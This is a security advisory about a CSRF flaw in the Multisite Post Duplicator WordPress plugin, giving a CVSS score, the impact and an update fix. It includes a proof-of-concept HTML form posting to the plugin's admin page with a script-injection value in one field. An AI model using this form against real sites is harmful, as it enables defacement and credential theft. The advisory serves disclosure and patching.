CSRF vulnerability in Multisite Post Duplicator could allow an attacker to do almost anything an admin user can do

Score Vector Complexity Authentication Confidentiality Integrity Availability
5.8
Medium
Network Medium None Partial Partial None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Vulnerability

Contains a CSRF vulnerability which can copy content from one site of a multisite installation to another.

This could be used to add arbitrary HTML to the front-end of the site (which could be used for defacement, harvesting login credentials from authenticated users, or could be used to do virtually anything a logged-in admin user can do).

This could also be used to view content not meant to be published.

Proof of concept

Some of these values may need adjusting depending on the post IDs, blog IDs, etc.

<form method="POST" action="http://localhost/wp-admin/tools.php?page=mpd">
  <input type="text" name="mpd-post-status" value="draft">
  <input type="text" name="mdp-prefix" value="&lt;script&gt;alert(1)&lt;/script&gt;">
  <input type="text" name="action" value="add_foobar">
  <input type="text" name="el0" value="post">
  <input type="text" name="el1" value="1">
  <input type="text" name="el2" value="1">
  <input type="text" name="el3" value="1">
  <input type="text" name="duplicate-submit" value="Duplicate">
  <input type="submit">
</form>

Mitigation/further actions

Update to version 1.1.3 or later.